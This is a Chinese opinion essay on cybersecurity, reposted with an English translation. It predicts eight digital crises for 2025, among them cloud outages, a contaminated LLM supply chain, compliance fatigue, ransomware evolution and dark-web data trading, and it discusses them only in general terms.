2025,数字化面临的危机

admin 2025年1月1日21:51:59评论43 views字数 13842阅读46分8秒阅读模式
2025以至,各种十大纷沓而至,从一个基层草根工作者而言,2025年,我们将面临哪些数字化危机成为指导网络安全工作的一项重要参考。结合近五年我们所做的,所看到的,所听到的,以及国家层出不穷的政策、法规、部门规章和各种标准,笔者提出2025年我们将要面对的数字化危机,本打算使用“恐怖”,又怕被定义为标题党,因此,还是用“危机”更为贴切。
首先,我们将面临各种千奇百怪的云中断问题。实际上,从传统网络技术而言,一台服务器主机的最小影响边界是一个业务功能或模块;最大影响是一个业务逻辑彻底崩溃;但是从云技术而言,一台虚拟主机的崩溃最小影响是该虚拟主机上所发布的SaaS应用,但是由于在共享资源情况下,一台虚拟主机崩溃所产生的蝴蝶效应,可能会导致整个资源池产生竞态条件而崩溃,进而影响到整个云平台。这本身是一个很简单的技术逻辑问题,但是实际在产生纠错的过程中由于,软件开发、云服务商、SaaS管理员以及跨组织的应用业主问题,导致产生实际的统一响应成为难题。而且,随着云技术的泛化,各种云平台接踵而来,政务云、信创云、公有云、社区云、私有云甚至还包括很多专业云,各种云平台本身是否存在安全的云架构,在实际的云设计中并没有很好的体现。很多时候,我们是在一朵已经被污染或者即将被污染的云平台上部署孱弱的云应用。最终云的危机将在低质的软件开发场景下暴露无遗。
其次,被污染的LLM供应链。大模型供应链可能会让很多人认为是构成大模型的供应关系。我更想讨论的是基于大模型应用所产生的供应链危机。随着人们对生成式人工智能的信赖,很多时候,在完全依赖生成式人工智能决策和生产产品,诸如:文件、方案、代码、学习评价、总结等等……但是当我们利用这些技术的同时,我们会不会验证大模型所输出的结果是否是正确的或者是否符合我们的需求,变得越来越模糊。诸如大模型在生成代码中插入恶意脚本,我相信这不只是最终而仅仅是开始。更多的时候大模型在生成式问答中产生的歧视性回答,甚至可能产生的意识形态领域问题回答在挑战着社会的秩序和稳定。我们会去对大模型输出的结果提出质疑,但是我们是否会对大模型为什么产生这样的输出提出过质疑呢?到底是预设模型出了问题,还是训练数据出了问题?我们到底使用的自己的模型还是使用的是公共接口模型?这种错误会蔓延多久,谁来纠正、检测、识别和阻止这种错误的发生却成为一个谜团。当我们信任大模型将数据基于token模式进行处理所产生的数据安全的同时,我们是否能意识到,机器如何转换,最终他的创作者依旧可以具有还原数据的能力。更关键的是,当我们将大模型应用于能源、交通、医疗等行业领域时,会“胡说八道”的大模型的自动决策机制会不会导致更严重的危机和后果呢?这个有时候不是你如何调优的问题,而是必须基于大模型可能产生的恶性后果是否具有应急响应处置能力的问题。
第三、盲目的数据安全技术手段。“针对重要数据需建立存储加密”,不管是《数据安全法》还是《网络数据安全管理条例》都在对这个问题做出明确的要求。从根本而言,这是一个必要的技术手段和措施,但是是否真可以直接对数据库实施加密操作,这个问题在不断的挑战各个组织。我们往往面临的一个事实。很多机构做安全工作的不懂业务和数据库技术,甚至不懂开发。这导致安全思想往往建立在合规性和纯粹的黑客攻防思想之上(当然,这种黑客思想并不是实战思想,更多的是“CTF黑客”思想),一味的强调安全至上的理想。但现实中我们所面临的是针对数据所开展的所有技术手段都可能直接或间接的导致业务的中断或延时。真正能够从业务角度考虑数据安全问题的组织和专家并不多。因此,数据安全合规带来的业务危机成为不可避免的存在。
第四、如何应对高高在上的劣质软件开发。IT领域本身是一个技术性很强的行业,本身从事这个行业的人应该把自己的自信和尊重建立在对技术的追溯和实现中。但是现在存在的一些畸形的技术思维让这个行业成为一种娱乐。很多软件开发商能够获得大量的开发项目和持续的维护工程,并不是因为其开发能力的优秀,更多的是商务关系所带来的利益化。一旦所开发软件出现问题,更多的不是靠开发技术去解决问题,而是靠人脉去平息舆论。这种情况与我国高速发展的数字化建设形成对立。近几年,不管是在软件供应链安全审计还是在软件生命周期审计工作中,越来越多的发现,基层软件开发团队的各种弊端和问题。一个开发团队最硬气的不是核心开发工程师,而是项目经理,而项目经理的硬气不是来自于项目质量,而是来自于社会关系。尤其是在政务系统和央国企范围内尤为盛行。姑且不论将来数字化的危机问题,毕竟很多数字化问题会在今后的应用中逐一凸显。更重要的是,数据安全的根本源自于软件在设计时如何有效处置数据的活动并通过有效的代码对数据进行调度。如果我们依旧将软件停留在功能的堆叠上,数据安全永远只是一个合规性要求。
第五、如何应对层出不穷的合规性检查。从最初的网络安全等级保护测评,到密码测评,数据安全评估,未来的关键信息基础设施评测。大多数网络运营者为了应对这些问题已经疲于奔命。没有统一的标准和准则,导致国家、行业、省、上级主管部门在检查过程中各种的冲突、矛盾。几乎所有的组织都在为检查而工作,为检查而投入。检查本身应该是透明的,也就是说,我们必须告诉被检查方,检查的依据、要求、准则、评判的标准,但是现实中,我们更多的是为了某种利益而去检查。导致我们的安全工作真正落于实处的越来越少。
第六、“合规不代表安全、认证不代表专业”如何理解合规和认证,这成为一种新的危机。《网络数据安全管理条例》提出,网络数据管理人员应具备网络数据安全专业知识,但这个“专业知识”如何体现,靠基本证书吗?靠实际工作经验和历程吗?一直在自上而下的讨论安全认证、安全培训如何更加落于实处,但是真正在执行的过程中,我们会发现这是一个庞大的生态链问题而不是简单的你建一个专业、出一本教材或者搞一个认证就能解决的。解决人的问题才是根本。做合规的是不是真的懂合规,做培训的是不是真的理解你所讲的知识。理论上,任何一个事物的初期,掌握这种技能只是个别人而不是大众。在不断的迭代中形成的知识传递和发展才是形成知识认知的良性过程。证书不能代表能力使得国产证书越来越被商业价值取代,这种危机将会长远的影响未来网络安全工作的开展和进步。
第七、还是“勒索病毒”。“勒索病毒”的进化速度已经超越了我们的防守速度。在高价值诱惑下,“勒索病毒”的技术发展依旧会不断的前进,也许就是我们在元旦跨年夜狂欢的一个晚上,新的“勒索”变种已经诞生。本质上,这是真正意义上的技术对抗。他所代表的是网络安全工作这40年来的大集合。可能很多人会说APT才是顶峰,但是要知道,很多时候勒索病毒本身已经在大量使用APT技术。未来高潜伏性勒索病毒已经不在再是单纯的勒索,而是结合网络作战、持续扒窃和智能分析判断高价值目标、利用云技术的跨资源池的侵入等多项能力,多源化的勒索病毒越来越像《黑客帝国》中的虚拟世界的霸权者。未来勒索病毒会不会基于智能化的发展演变为非人控制而具有自主意识的病毒不得而知,但这一定不是幻想,而是一种必然。可以预见的是,未来将内存技术应用的淋漓尽致的勒索病毒将比当年的“震网”更加恐怖。
第八、经济危机下带来的“暗网经济”的繁荣。数据的情报化、商业化使得近年来爬库、卖库市场越来越繁荣。甚至已经出现内部人员或第三方服务人员海量卖库的行为。数据安全的挑战有时候不仅仅是应对来自于外部的攻击。内部的数据非法获取和非法利用将随着暗网经济的发展越来越普遍。在暗网经济的刺激下,各种数据源源不断得投送到暗网中,各种利益团体通过所获得的数据形成新一波的国家威胁、网络诈骗、数据分析和数据的再加工将变得更加普遍。永远不要去讨论如何保护个人隐私,更多时候,我们应该关注的是隐私被恶意利用时,我们用什么样的方法和手段来保护自己利益不会受损。
这是从一个实用主义者的角度所提出的2025危机问题,无法和各种高大上的专家言论相提并论。更多的时候,我们需要从危机中产生一种惊醒或应对手段。而不是等危机降临后祈求上天的宽恕。任何一次损失都是上天对不尊重规矩所带来的惩罚,我们没有网络安全的“诺亚方舟”,我们只能依靠普通人类的力量去对抗来自“网络上帝”的惩罚。
你做好接受惩罚的准备了吗?

From 2025 onwards, various top ten challenges will emerge. As a grassroots worker, the digital crises we will face in 2025 have become an important reference for guiding cybersecurity work. Based on what we have done, seen, heard in the past five years, as well as the constantly emerging policies, regulations, departmental rules, and various standards of the country, the author proposes the digital crisis we will face in 2025. Originally, we planned to use "terror", but we were afraid of being defined as a title party, so we still use "crisis" more appropriately.

Firstly, we will face various strange cloud interruption issues. In fact, from the perspective of traditional network technology, the minimum impact boundary of a server host is a business function or module; The biggest impact is a complete breakdown of business logic; However, from the perspective of cloud technology, the minimal impact of a virtual host crash is on the SaaS applications published on that virtual host. However, due to the butterfly effect caused by a virtual host crash in the case of shared resources, it may lead to competition conditions in the entire resource pool and crash, thereby affecting the entire cloud platform. This itself is a simple technical logic issue, but in the actual process of error correction, due to issues with software development, cloud service providers, SaaS administrators, and cross organizational application owners, achieving a unified response becomes a challenge. Moreover, with the generalization of cloud technology, various cloud platforms have emerged one after another, including government cloud, information and innovation cloud, public cloud, community cloud, private cloud, and even many professional clouds. Whether there is a secure cloud architecture for each cloud platform itself has not been well reflected in actual cloud design. Many times, we deploy weak cloud applications on a cloud platform that has already been polluted or is about to be polluted. The ultimate crisis of cloud computing will be exposed in low-quality software development scenarios.

Secondly, the contaminated LLM supply chain. A large model supply chain may be perceived by many as the supply relationships that make up the large model. What I would like to discuss more is the supply chain crisis arising from the application of large-scale models. With people's trust in generative artificial intelligence, many times we rely entirely on it for decision-making and production of products, such as files, plans, code, learning evaluations, summaries, etc. However, as we utilize these technologies, it becomes increasingly unclear whether we will verify whether the results output by large models are correct or meet our needs. I believe that inserting malicious scripts into the generated code of large models is not just the end, but just the beginning. More often than not, the discriminatory answers generated by large models in generative question answering, and even the ideological domain questions that may arise, are challenging social order and stability. We will question the output of the big model, but have we ever questioned why the big model produces such output? Is it a problem with the preset model or with the training data? Are we using our own model or are we using a common interface model? How long will this error spread, and who will correct, detect, identify, and prevent its occurrence remains a mystery. When we trust the big model to process data based on token patterns for data security, can we also realize how machines can transform and ultimately their creators can still have the ability to restore data. More importantly, when we apply big models to industries such as energy, transportation, and healthcare, will the automatic decision-making mechanism of the "nonsense" big models lead to more serious crises and consequences? Sometimes it's not a matter of how you tune it, but rather a question of whether the malignant consequences that a large model may produce have emergency response capabilities.

Thirdly, blind data security techniques. Both the Data Security Law and the Network Data Security Management Regulations have made clear requirements for establishing storage encryption for important data. Fundamentally, this is a necessary technical means and measure, but the question of whether encryption operations can be directly implemented on databases is constantly challenging various organizations. We often face a fact. Many institutions that do security work do not understand business and database technology, and even do not understand development. This often leads to security thinking being based on compliance and pure hacker attack and defense thinking (of course, this hacker thinking is not practical thinking, but more of a "CTF hacker" thinking), blindly emphasizing the ideal of security first. But in reality, we are faced with the possibility that all technological means developed for data may directly or indirectly lead to business interruption or delay. There are not many organizations and experts who can truly consider data security issues from a business perspective. Therefore, the business crisis brought about by data security compliance has become an inevitable existence.

Fourth, how to deal with inferior software development that is superior to others. The IT field itself is a highly technical industry, and those who work in this industry should build their confidence and respect on the traceability and implementation of technology. But now there are some distorted technological thinking that make this industry a form of entertainment. Many software developers are able to obtain a large number of development projects and ongoing maintenance projects not because of their excellent development capabilities, but more because of the benefits brought by business relationships. Once there is a problem with the developed software, it is not more about relying on development skills to solve the problem, but rather on networking to quell public opinion. This situation is in opposition to China's rapidly developing digital construction. In recent years, whether in software supply chain security audits or software lifecycle audits, an increasing number of drawbacks and problems have been discovered in grassroots software development teams. The toughest part of a development team is not the core development engineer, but the project manager, and the toughness of the project manager does not come from project quality, but from social relationships. Especially prevalent within the government system and state-owned enterprises. Leaving aside the crisis of digitalization in the future, many digital issues will be highlighted one by one in future applications. More importantly, the fundamental source of data security lies in how software effectively handles data activities during design and schedules data through effective code. If we continue to stack software on top of functionality, data security will always be just a compliance requirement.

Fifth, how to deal with the endless compliance checks. From the initial evaluation of network security level protection, to password evaluation, data security evaluation, and future critical information infrastructure evaluation. Most network operators are already exhausted in dealing with these issues. The lack of unified standards and guidelines has led to various conflicts and contradictions among national, industry, provincial, and higher-level supervisory departments during the inspection process. Almost all organizations are working and investing for inspection. The inspection itself should be transparent, which means that we must inform the inspected party of the basis, requirements, criteria, and evaluation standards for the inspection. However, in reality, we mostly inspect for certain interests. Less and less of our security work is truly implemented.

Sixth, how to understand compliance and certification as "compliance does not represent safety, and certification does not represent professionalism" has become a new crisis. The Regulations on the Administration of Network Data Security propose that network data management personnel should possess professional knowledge of network data security. However, how can this "professional knowledge" be reflected? Does it rely on basic certificates? Is it based on practical work experience and history? We have been discussing from top to bottom how to implement security certification and training more practically, but in the actual implementation process, we will find that this is a huge ecological chain problem that cannot be solved simply by building a profession, publishing a textbook, or conducting certification. Solving people's problems is fundamental. Do compliance professionals truly understand compliance, and do training professionals truly comprehend the knowledge you are discussing. In theory, in the early stages of anything, mastering this skill is only for individuals rather than the general public. The knowledge transmission and development formed through continuous iteration is the benign process of forming knowledge cognition. Certificates cannot represent abilities, and domestic certificates are increasingly being replaced by commercial value. This crisis will have a long-term impact on the development and progress of future cybersecurity work.

Seventh, it is still 'ransomware'. The evolution speed of ransomware has surpassed our defense speed. Under the temptation of high value, the technological development of "ransomware" will continue to advance. Perhaps on the night of our New Year's Eve celebration, a new variant of "ransomware" has been born. Essentially, this is a true technological confrontation. He represents the culmination of 40 years of cybersecurity work. Many people may say that APT is the pinnacle, but it should be noted that ransomware itself is already heavily using APT technology. In the future, high latency ransomware is no longer just about extortion, but a combination of network warfare, continuous pickpocketing, intelligent analysis and judgment of high-value targets, and cross resource pool intrusion using cloud technology. Multi source ransomware is becoming more and more like the virtual world hegemon in "The Matrix". It is unknown whether future ransomware will evolve into non-human controlled viruses with autonomous consciousness based on intelligent development, but this is definitely not an illusion, but a necessity. It can be foreseen that ransomware that fully applies memory technology in the future will be even more terrifying than the "Stuxnet" of the past.

Eighth, the prosperity of the "dark web economy" brought about by the economic crisis. The intelligence and commercialization of data have made the crawling and selling of inventory markets increasingly prosperous in recent years. Even internal personnel or third-party service personnel have engaged in massive inventory sales. The challenge of data security is sometimes not just about dealing with external attacks. The illegal acquisition and exploitation of internal data will become increasingly common with the development of the dark web economy. Under the stimulation of the dark web economy, various types of data are continuously being delivered to the dark web, and various interest groups will form a new wave of national threats, online fraud, data analysis, and data reprocessing through the obtained data, which will become more common. Never discuss how to protect personal privacy. More often than not, we should focus on what methods and means we use to protect our interests from being harmed when privacy is maliciously exploited.

This is a 2025 crisis issue proposed from the perspective of a pragmatist, which cannot be compared to the opinions of various high-end experts. More often than not, we need to generate a wake-up call or coping mechanism from a crisis. Instead of waiting for the crisis to come and praying for forgiveness from heaven. Any loss is a punishment from heaven for disrespecting rules. We do not have a 'Noah's Ark' for cybersecurity, and we can only rely on the power of ordinary humans to resist punishment from the 'God of the Internet'.

Are you ready to accept punishment?

原文始发于微信公众号(老烦的草根安全观):2025,数字化面临的危机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月1日21:51:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2025,数字化面临的危机https://cn-sec.com/archives/3581302.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息